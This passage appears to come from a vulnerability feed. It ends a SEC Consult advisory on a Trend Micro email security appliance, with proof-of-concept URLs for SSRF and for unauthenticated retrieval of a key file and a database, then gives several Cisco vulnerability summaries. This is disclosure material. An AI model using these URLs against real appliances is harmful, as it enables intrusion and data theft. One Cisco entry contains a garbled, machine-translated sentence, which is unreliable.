well-checked. Users cannot input any arguments with other meaning, so it cannot terminate or inject commands. Trend Micro decided not to include vulnerability #3 in the hardening/patch of the product as admin and enabled accounts are as important as root and changing the architecture would cause some functions not to work as expected. 4) Server Side Request Forgery (SSRF) & Local File Disclosure (CVE-2020-27018) The URL demonstrates the retrieval of an HTTP URL through the appliance: https://<host>:8445/widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://test When accessing file:// URLs, the application sends only the content that follows a sequence \r\n\r\n. Therefore only parts of certain files can be retrieved. 5) Information Disclosure (CVE-2020-27019) The following URL demonstrates the unauthenticated retrieval of a cryptographic key: https://<host>:8445/widget/repository/inc/class/common/crypt/crypt.key Moreover, an SQLite database can be retrieved. https://<host>:8445/widget/repository/db/sqlite/tmwf.db The contents of these files have not been further investigated. 6) Insufficient Password Storage (CVE-2020-27693) The passwords for local administrators are stored in a Postgres database (table tb_administrator, column md5_digest). The hashes are stored as unsalted MD5 digests which can be cracked easily. 7) Outdated Software (CVE-2020-27694) The following software versions are present in an appliance with patch level 1993: * PHP 5.6.38 (PHP 5.6 is EOL) * Apache HTTPD 2.4.37 (see http://httpd.apache.org/security/vulnerabilities_24.html) * Apache Tomcat 9.0.13 (see http://tomcat.apache.org/security-9.html) The appliance is built on top of a CentOS base system. The CentOS packages appear not to be updated with appliance updates. In a test system, the command "yum check-update" yielded 203 updates to installed packages. Vulnerable / tested versions: ----------------------------- Version 9.1.0.1960 Critical Patch 1993 has been tested and was found to be vulnerable. Previous versions are affected as well. Vendor contact timeline: ------------------------ 2020-04-28: Contacting vendor through security@trendmicro.com Submitting advisory information encrypted (PGP). 2020-04-28: Vendor reply, they will take a look at the issue. 2020-05-06: Vendor states that vulnerability resolution is in progress; Vendor has questions regarding two vulnerabilities 2020-05-07: Clarifying vulnerabilities 2020-05-25: Asking for status update 2020-05-25: Vendor: Vulnerability resolution is still in progress, details follow 2020-05-27: Vendor: A fix for 4 vulnerabilities is expected for the end of June 2020-06-29: Asking for status update 2020-07-01: Vendor provides prerelease update that addresses #1, #2, #4, #5, #6 2020-07-07: Sending results of short recheck #1 CSRF - fixed #2 XXE - fixed #4 SSRF/LFD - fixed #5 InfoDisc - fixed #6 Password Storage - not properly fixed yet 2020-07-08: Vendor confirms receipt; has question regarding #3 2020-07-10: Clarifying questions 2020-08-04: Asking for a status update 2020-08-04: Vendor: Issue #3 is under investigation, issue #7 in progress. 2020-08-22: Vendor provides information that all issues have been fixed except issue #3 as hardening it further would potentially break some features. 2020-08-24: Further advisory release coordination (date, CVE numbers, patch version) 2020-09-18: Asking for a status update; Answer: "The hotfix is ready, however, the official critical patch to be used for public disclosure is still being finalized"; disclosure date will be communicated later 2020-10-23: Patch is already public since 2020-10-09, but no security bulletin yet which will be coordinated 2020-11-04: Coordinated release of security advisory Solution: --------- The vendor provides a patch (9.1 Patch 3 - Critical Patch - Build 2025) which should be installed immediately. The release notes can be found here: https://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_EN_Readme.txt Patch download: https://downloadcenter.trendmicro.com/index.php?regs=nabu&prodid=91 https://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz Trend Micro Security Bulletin: https://success.trendmicro.com/solution/000279833 Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF W. Ettlinger / @2020

A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client Software could allow an authenticated, local attacker to cause a targeted AnyConnect user to execute a malicious script. The vulnerability is due to a lack of authentication to the IPC listener. An attacker could exploit this vulnerability by sending crafted IPC messages to the AnyConnect client IPC listener. A successful exploit could allow an attacker to cause the targeted AnyConnect user to execute a script. This script would execute with the privileges of the targeted AnyConnect user. In order to successfully exploit this vulnerability, there must be an ongoing AnyConnect session by the targeted user at the time of the attack. To exploit this vulnerability, the attacker would also need valid user credentials on the system upon which the AnyConnect client is being run. Cisco has not released software updates that address this vulnerability. Cisco AnyConnect Secure Mobility Client There are unspecified vulnerabilities in the software.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco AnyConnect Secure Mobility Client for Linux, etc. are all products of Cisco (Cisco). Cisco AnyConnect Secure Mobility Client for Linux is a Linux-based secure mobile client that provides secure access to networks and applications from any device. Cisco AnyConnect Secure Mobility Client for Android is a secure mobile client based on the Android platform that provides secure access to networks and applications from any device. Cisco AnyConnect Secure Mobility Client for Windows is a Windows-based secure mobile client that provides secure access to networks and applications from any device

A vulnerability in Cisco Unified Communications Manager IM &amp; Presence Service (Unified CM IM&amp;P) Software could allow an authenticated, remote attacker to cause the Cisco XCP Authentication Service on an affected device to restart, resulting in a denial of service (DoS) condition. The vulnerability is due to improper handling of login requests. An attacker could exploit this vulnerability by sending a crafted client login request to an affected device. A successful exploit could allow the attacker to cause a process to crash, resulting in a DoS condition for new login attempts. Users who are authenticated at the time of the attack would not be affected. There are workarounds that address this vulnerability. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution

A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies

A vulnerability in the Microsoft Active Directory integration of Cisco Identity Services Engine (ISE) could allow an authenticated, local attacker to elevate privileges on an affected device. To exploit this vulnerability, an attacker would need to have a valid administrator account on an affected device. The vulnerability is due to incorrect privilege assignment. An attacker could exploit this vulnerability by logging in to the system with a crafted Active Directory account. A successful exploit could allow the attacker to obtain root privileges on an affected device. Cisco Identity Services Engine (ISE) is an identity-based context-aware platform (ISE Identity Services Engine) from Cisco. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies

A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to read arbitrary files on the underlying operating system of an affected device. The vulnerability is due to an exposed IPC function. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process on an affected device. A successful exploit could allow the attacker to read arbitrary files on the underlying operating system of the affected device